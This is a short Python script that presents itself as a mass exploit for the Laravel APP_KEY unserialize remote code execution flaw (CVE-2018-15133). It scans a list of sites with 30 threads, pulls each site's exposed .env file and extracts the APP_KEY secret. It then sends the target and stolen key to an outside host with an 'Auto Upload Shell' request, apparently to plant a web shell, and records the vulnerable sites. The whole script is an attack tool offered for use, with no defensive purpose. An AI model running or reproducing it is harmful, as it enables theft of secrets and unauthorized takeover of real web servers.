rce.py

import requests, re 
from multiprocessing import Pool
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore, init
init(autoreset=True)

Thread_ = '30' #Thread

def app_key(site):
  try:
    if not re.search('http(s)?://', site): site = 'http://'+site
    a = requests.get(site + '/.env')
    app = re.findall('APP_KEY=base64:(.*)', a.text)
    data = {
    'target': site,
    'key': app[0],
    'autoshell': 'Auto Upload Shell'
    }
    c = requests.post('http://exploit.anons79.com/', data).text
    if re.search('Vuln OK', c):
        print(site + "/.env --> " + Fore.YELLOW+"Vuln") 
        save = open('Vulns.txt', 'a')
        save.write(site+'/.env'+'\n')
        save.close()
    else:
        print(site + "/.env --> " + Fore.RED+"Not Vulnerable")
  except:
    print(site + Fore.RED+" APP_KEY Not Found")

banner = """
 [CVE-2018-15133] - Laravel Unserialized RCE
Coded By : KimiHmei7 [AzhariKun]
"""
print banner
site = open(raw_input('Your List : '),'r').read().split()
Thread = raw_input('Thread : ')
if site:
  pool = ThreadPool(int(Thread_))
  pool.map(app_key, site) 
  pool.close()
  pool.join()
#thanks to Zeerx7 & Con7ext